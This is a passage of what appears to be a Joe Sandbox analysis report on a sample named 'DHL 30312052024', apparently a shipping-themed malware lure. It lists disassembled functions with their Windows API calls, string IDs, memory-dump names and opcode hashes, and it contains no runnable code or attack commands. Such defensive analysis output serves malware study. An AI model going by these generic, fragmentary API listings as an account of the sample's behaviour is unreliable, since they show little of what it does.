                                                                                        • CharLowerBuffW.USER32(?,?,00C8F910), ref: 00C6A90B
                                                                                        • GetDriveTypeW.KERNEL32(00000061,00CB89A0,00000061), ref: 00C6A9D5
                                                                                        • _wcscpy.LIBCMT ref: 00C6A9FF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                        • API String ID: 2820617543-1000479233
                                                                                        • Opcode ID: c388e3d36b623621d11a0f4e3bd8e5b23ad02af69e98afa103cced1165541b81
                                                                                        • Instruction ID: f3e5e844d6d87a48037e2bbf7d60bc96aa43daf369ef38a7075f2c07ff824638
                                                                                        • Opcode Fuzzy Hash: c388e3d36b623621d11a0f4e3bd8e5b23ad02af69e98afa103cced1165541b81
                                                                                        • Instruction Fuzzy Hash: 7A51AE31508301ABC724EF14D8D2AAFB7A5EF84704F64482EF595672E2DB319A09EF53
                                                                                        Function 00C88645 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 168COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C886FF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: InvalidateRect
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 634782764-2594219639
                                                                                        • Opcode ID: a1c1c2183abe17a0b7f33d0066596fa72365f2a5f3adf45a908336099a2a2807
                                                                                        • Instruction ID: 9d1fa5eb8f407506404c1874fa1efa2dd2e2fb8afda50abe877e71c75d5b1746
                                                                                        • Opcode Fuzzy Hash: a1c1c2183abe17a0b7f33d0066596fa72365f2a5f3adf45a908336099a2a2807
                                                                                        • Instruction Fuzzy Hash: 3751B670500244FFEF20AB25CC89F5D7BA4EB05728FA04115FA21D69E1DF71AE88DB58
                                                                                        Function 00C02B72 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 161windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00C3C2F7
                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C3C319
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C3C331
                                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00C3C34F
                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C3C370
                                                                                        • DestroyIcon.USER32(00000000), ref: 00C3C37F
                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C3C39C
                                                                                        • DestroyIcon.USER32(?), ref: 00C3C3AB
                                                                                          • Part of subcall function 00C8A4AF: DeleteObject.GDI32(00000000), ref: 00C8A4E8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 2819616528-2594219639
                                                                                        • Opcode ID: ac7618027d1567a89fd75200107d879e86dbc1ed1d4fb7674993751692c7d024
                                                                                        • Instruction ID: 58610d9af32832b9e96526dd09085ebc13ffe1bb1ea62c54ef8a2c0e22028154
                                                                                        • Opcode Fuzzy Hash: ac7618027d1567a89fd75200107d879e86dbc1ed1d4fb7674993751692c7d024
                                                                                        • Instruction Fuzzy Hash: 1F514870A10609AFEB24DF65CC89FAE7BB5EB58310F104529F912E72E0D770A991EB50
                                                                                        Function 00C09837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __i64tow__itow__swprintf
                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                        • API String ID: 421087845-2263619337
                                                                                        • Opcode ID: 42b52c065aabb928289dda7656e3ce160546deddcd87ede092d67a5601f08801
                                                                                        • Instruction ID: 5d7f3fdae41bd3c6e43cd3c0537cb1c36fc16b5168371ae8376096c22f995b9b
                                                                                        • Opcode Fuzzy Hash: 42b52c065aabb928289dda7656e3ce160546deddcd87ede092d67a5601f08801
                                                                                        • Instruction Fuzzy Hash: CE41C371914205AFDB24EF35D846F7A73E8EF05300F20497EE559D62D2EA31AA42DB10
                                                                                        Function 00C87152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C8716A
                                                                                        • CreateMenu.USER32 ref: 00C87185
                                                                                        • SetMenu.USER32(?,00000000), ref: 00C87194
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C87221
                                                                                        • IsMenu.USER32(?), ref: 00C87237
                                                                                        • CreatePopupMenu.USER32 ref: 00C87241
                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C8726E
                                                                                        • DrawMenuBar.USER32 ref: 00C87276
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                        • String ID: 0$F
                                                                                        • API String ID: 176399719-3044882817
                                                                                        • Opcode ID: c8b5f0dacb7b33a23905dda484b0143ff46222a468232eaa0546b1ae017152ad
                                                                                        • Instruction ID: fcdc9d9c2bd35dfe620bc42386c781dd9f7fe1105891f99c3a646c3bce083fe3
                                                                                        • Opcode Fuzzy Hash: c8b5f0dacb7b33a23905dda484b0143ff46222a468232eaa0546b1ae017152ad
                                                                                        • Instruction Fuzzy Hash: A7415A75A01205EFDB10EFA4D888F9ABBB5FF49314F240128F925A7361E731AA10CF94
                                                                                        Function 00C58F8F Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                          • Part of subcall function 00C5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C5AABC
                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00C59014
                                                                                        • GetDlgCtrlID.USER32 ref: 00C5901F
                                                                                        • GetParent.USER32 ref: 00C5903B
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C5903E
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00C59047
                                                                                        • GetParent.USER32(?), ref: 00C59063
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C59066
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                        • String ID: @U=u$ComboBox$ListBox
                                                                                        • API String ID: 1536045017-2258501812
                                                                                        • Opcode ID: de8ba449e3368f5cad7e70b4671824623cb378e412408b42ab7fdc2f8ebd479a
                                                                                        • Instruction ID: affbeec9d2388a9d244453f239475b9b20dcda1d5b32769e0dfdf137bfd0fc4a
                                                                                        • Opcode Fuzzy Hash: de8ba449e3368f5cad7e70b4671824623cb378e412408b42ab7fdc2f8ebd479a
                                                                                        • Instruction Fuzzy Hash: 7121C474A00108BFDF04ABA0CC85FFEBB74EF89310F100269B921972E1EB755959EB24
                                                                                        Function 00C5907A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 81windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                          • Part of subcall function 00C5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C5AABC
                                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00C590FD
                                                                                        • GetDlgCtrlID.USER32 ref: 00C59108
                                                                                        • GetParent.USER32 ref: 00C59124
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C59127
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00C59130
                                                                                        • GetParent.USER32(?), ref: 00C5914C
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C5914F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                        • String ID: @U=u$ComboBox$ListBox
                                                                                        • API String ID: 1536045017-2258501812
                                                                                        • Opcode ID: c8a2f2d0a6847f76ba17e1ca7d58b380f3473b555232ca281b5af791ee7c72ec
                                                                                        • Instruction ID: a5b176aa43ced40f439ccdc0564c9ebb25859e1fd09995b81e16291d3af692a3
                                                                                        • Opcode Fuzzy Hash: c8a2f2d0a6847f76ba17e1ca7d58b380f3473b555232ca281b5af791ee7c72ec
                                                                                        • Instruction Fuzzy Hash: 6021C474A00118BBDF00ABA1CC85FFEBB74EF48300F100159B911972E2DB755559EF24
                                                                                        Function 00C59163 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 72windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetParent.USER32 ref: 00C5916F
                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00C59184
                                                                                        • _wcscmp.LIBCMT ref: 00C59196
                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C59211
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                                        • String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                        • API String ID: 1704125052-1428604138
                                                                                        • Opcode ID: cf1f4088bad0a8519b112f0f17954643b50de51ece1d645282a27d50a2ae8bd3
                                                                                        • Instruction ID: cddc52771766a2d4394928bf70f98746a8849bad4720deefdbd6077dd4ed6806
                                                                                        • Opcode Fuzzy Hash: cf1f4088bad0a8519b112f0f17954643b50de51ece1d645282a27d50a2ae8bd3
                                                                                        • Instruction Fuzzy Hash: 21115C3E648317F9FA202624EC0AEEB379CDB11322F200176FD10E04E1FE7159957658
                                                                                        Function 00C26E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C26E3E
                                                                                          • Part of subcall function 00C28B28: __getptd_noexit.LIBCMT ref: 00C28B28
                                                                                        • __gmtime64_s.LIBCMT ref: 00C26ED7
                                                                                        • __gmtime64_s.LIBCMT ref: 00C26F0D
                                                                                        • __gmtime64_s.LIBCMT ref: 00C26F2A
                                                                                        • __allrem.LIBCMT ref: 00C26F80
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C26F9C
                                                                                        • __allrem.LIBCMT ref: 00C26FB3
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C26FD1
                                                                                        • __allrem.LIBCMT ref: 00C26FE8
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C27006
                                                                                        • __invoke_watson.LIBCMT ref: 00C27077
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                        • String ID:
                                                                                        • API String ID: 384356119-0
                                                                                        • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                        • Instruction ID: bc70c3988de69e12adfa2f4eb632f1f2212de67906eb0d04bc6e10cb7d4bb151
                                                                                        • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                        • Instruction Fuzzy Hash: 9A712A76A00727ABD714DF78EC81B5AB3A4AF04324F144239F424D7A81E770EE449790
                                                                                        Function 00C62527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C62542
                                                                                        • GetMenuItemInfoW.USER32(00CC5890,000000FF,00000000,00000030), ref: 00C625A3
                                                                                        • SetMenuItemInfoW.USER32(00CC5890,00000004,00000000,00000030), ref: 00C625D9
                                                                                        • Sleep.KERNEL32(000001F4), ref: 00C625EB
                                                                                        • GetMenuItemCount.USER32(?), ref: 00C6262F
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00C6264B
                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00C62675
                                                                                        • GetMenuItemID.USER32(?,?), ref: 00C626BA
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C62700
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C62714
                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C62735
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                        • String ID:
                                                                                        • API String ID: 4176008265-0
                                                                                        • Opcode ID: dc966211caba659aa52ce2debe73dada05fd7b1fd2f29d5a09c148ab3f067278
                                                                                        • Instruction ID: e9a41794809897737e1b29ffdaac6c5a26d9fa941c1cd05e4bb55e8491b5b400
                                                                                        • Opcode Fuzzy Hash: dc966211caba659aa52ce2debe73dada05fd7b1fd2f29d5a09c148ab3f067278
                                                                                        • Instruction Fuzzy Hash: 4061AEB0900A49AFDB31CFA4DCC8EBE7BB8EB01344F140069F852A7251D731AE46DB21
                                                                                        Function 00C86F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C86FA5
                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C86FA8
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C86FCC
                                                                                        • _memset.LIBCMT ref: 00C86FDD
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C86FEF
                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C87067
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$LongWindow_memset
                                                                                        • String ID:
                                                                                        • API String ID: 830647256-0
                                                                                        • Opcode ID: fffdb3a9c45c1b5a694e36e59a0766fbbf5858baa4db9bf3d1dfaa3cbd2dc872
                                                                                        • Instruction ID: 3298a11592c06188cded55f8290b91cea3c15a3765826363f9dee29b747546d0
                                                                                        • Opcode Fuzzy Hash: fffdb3a9c45c1b5a694e36e59a0766fbbf5858baa4db9bf3d1dfaa3cbd2dc872
                                                                                        • Instruction Fuzzy Hash: 13617A71900208AFDB11DFA4CC85FEE77B8EB09714F200159FA14EB2A1D771AE41DB94
                                                                                        Function 00C56B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C56BBF
                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00C56C18
                                                                                        • VariantInit.OLEAUT32(?), ref: 00C56C2A
                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C56C4A
                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00C56C9D
                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C56CB1
                                                                                        • VariantClear.OLEAUT32(?), ref: 00C56CC6
                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00C56CD3
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C56CDC
                                                                                        • VariantClear.OLEAUT32(?), ref: 00C56CEE
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C56CF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                        • String ID:
                                                                                        • API String ID: 2706829360-0
                                                                                        • Opcode ID: da89e415a81a502bd746314d616025650117e81434d598d56c5c815f83fbe320
                                                                                        • Instruction ID: 013b27b891314e267588547d3f98c5976e2c7be0fbaba6290c468c386901ddf0
                                                                                        • Opcode Fuzzy Hash: da89e415a81a502bd746314d616025650117e81434d598d56c5c815f83fbe320
                                                                                        • Instruction Fuzzy Hash: 0E4154759001199FCF00DF64D844AAEBBB9EF48351F408069E955E7361CB30EA8ADF94
                                                                                        Function 00C8D43E Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 257windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C02612: GetWindowLongW.USER32(?,000000EB), ref: 00C02623
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 00C8D47C
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 00C8D49C
                                                                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00C8D6D7
                                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00C8D6F5
                                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00C8D716
                                                                                        • ShowWindow.USER32(00000003,00000000), ref: 00C8D735
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00C8D75A
                                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 00C8D77D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 1211466189-2594219639
                                                                                        • Opcode ID: b3292736925c0a9d67ed7737480a4c508e1ee4bbdfcff666527e7e77b945482d
                                                                                        • Instruction ID: e9de60a007a0e60311b7ec70245161aae14c4a7a680efc4207735e4037446f80
                                                                                        • Opcode Fuzzy Hash: b3292736925c0a9d67ed7737480a4c508e1ee4bbdfcff666527e7e77b945482d
                                                                                        • Instruction Fuzzy Hash: 56B1AC71600229EFDF14DF68C9C5BAD7BB1BF04705F088069FC5A9B299E730AA90CB54
                                                                                        Function 00C783BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C09837: __itow.LIBCMT ref: 00C09862
                                                                                          • Part of subcall function 00C09837: __swprintf.LIBCMT ref: 00C098AC
                                                                                        • CoInitialize.OLE32 ref: 00C78403
                                                                                        • CoUninitialize.OLE32 ref: 00C7840E
